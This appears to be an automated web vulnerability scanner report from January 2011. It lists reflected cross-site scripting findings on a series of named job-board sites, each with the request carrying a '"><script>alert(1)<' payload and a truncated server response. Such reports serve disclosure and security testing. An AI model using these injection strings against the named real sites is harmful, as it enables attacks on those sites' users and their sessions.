| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:27:01 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=e48qt9e609 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:01 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:01 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:01 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:01 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:01 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:01 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:01 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 109901 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.fundraisi |
| Path: | / |
| GET /?28102"><script>alert(1)< Host: www.fundraisingcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:27:29 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=nm20dvfkbs Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:30 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:30 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:30 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:30 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:30 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:30 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:30 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 98025 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.giscrossing |
| Path: | / |
| GET /?6bc72"><script>alert(1)< Host: www.giscrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:27:32 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=rir4ndkuk4 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:32 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:32 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:32 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:32 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:32 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:32 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:32 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 109405 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.governmen |
| Path: | / |
| GET /?35b65"><script>alert(1)< Host: www.governmentcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:27:54 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=rpbso16tqs Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:54 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:54 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:54 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:54 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:54 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:54 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:54 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 117169 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.healthcar |
| Path: | / |
| GET /?60560"><script>alert(1)< Host: www.healthcarecrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:28:10 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=vlk8ael6dh Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:10 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:10 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:10 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:10 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:10 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:10 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:10 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 140436 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.helpdeskc |
| Path: | / |
| GET /?4ca57"><script>alert(1)< Host: www.helpdeskcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:28:14 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=5pc34q4kl0 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:14 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:14 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:14 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:14 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:14 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:14 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:14 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 108372 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.hospitali |
| Path: | / |
| GET /?832b1"><script>alert(1)< Host: www.hospitalitycrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:28:14 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=a67315d75b Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:14 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:14 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:14 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:14 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:14 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:14 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:14 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 129156 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.hrcrossing.com |
| Path: | / |
| GET /?fb605"><script>alert(1)< Host: www.hrcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:28:23 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=ffv3i9vte4 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:24 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:24 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:24 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:24 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:24 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:24 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:24 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 116797 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.hvaccrossing |
| Path: | / |
| GET /?c4ad5"><script>alert(1)< Host: www.hvaccrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:28:38 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=uipdahmc9k Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:38 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:38 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:38 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:38 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:38 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:38 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:38 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 112743 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.informati |
| Path: | / |
| GET /?abe89"><script>alert(1)< Host: www.informationtechn Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:28:56 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=airnfqpaun Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:57 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:57 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:57 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:57 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:57 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:57 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:57 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 133940 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.insurcrossing |
| Path: | / |
| GET /?eaf58"><script>alert(1)< Host: www.insurcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:28:52 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=d7obm82fb4 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:52 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:52 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:52 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:52 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:52 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:52 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:52 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 127269 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.intellect |
| Path: | / |
| GET /?fa1e0"><script>alert(1)< Host: www.intellectualprop Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:28:52 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=7ebiu1eg1h Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:53 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:53 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:53 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:53 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:53 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:53 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:53 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 118064 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.internshi |
| Path: | / |
| GET /?4b43b"><script>alert(1)< Host: www.internshipcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:28:57 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=8s0f63cmgh Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:57 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:57 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:57 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:57 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:57 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:57 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:57 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 132185 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.j2eecrossing |
| Path: | / |
| GET /?901d9"><script>alert(1)< Host: www.j2eecrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:29:02 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=4fiue61e3a Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:03 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:03 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:03 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:03 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:03 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:03 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:03 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 111709 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.journalis |
| Path: | / |
| GET /?49fb4"><script>alert(1)< Host: www.journalismcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 22 Jan 2011 01:25:15 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=m2dmhs0p97 Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:15 GMT Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:15 GMT Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:15 GMT Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:15 GMT Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:15 GMT Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:15 GMT Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:15 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 111407 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.lawcrossing |
| Path: | /lcjssearchresults.php |
| GET /lcjssearchresults.php/cde91"><script>alert(1)< Host: www.lawcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 19:41:32 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=7et0cefrt5 Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:33 GMT Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 92602 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_path = ''; HTT ...[SNIP]... <form id="formmain" name="formmain" Method="POST" action="/lcjssearchr ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.logistics |
| Path: | / |
| GET /?2c0f2"><script>alert(1)< Host: www.logisticscrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 23:38:55 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=qieacg3sf3 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:55 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:55 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:55 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:55 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:55 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:55 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:55 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 113405 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.managercr |
| Path: | / |
| GET /?fa799"><script>alert(1)< Host: www.managercrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 22 Jan 2011 01:23:18 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=94ctq8p6iv Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:18 GMT Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:18 GMT Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:18 GMT Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:18 GMT Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:18 GMT Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:18 GMT Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:18 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 128649 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.manufactu |
| Path: | / |
| GET /?3c71b"><script>alert(1)< Host: www.manufacturingcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 22 Jan 2011 01:22:53 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=2vlv8pl6j1 Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:54 GMT Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:54 GMT Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:54 GMT Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:54 GMT Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:54 GMT Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:54 GMT Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:54 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 121495 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.marketing |
| Path: | / |
| GET /?2da59"><script>alert(1)< Host: www.marketingcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
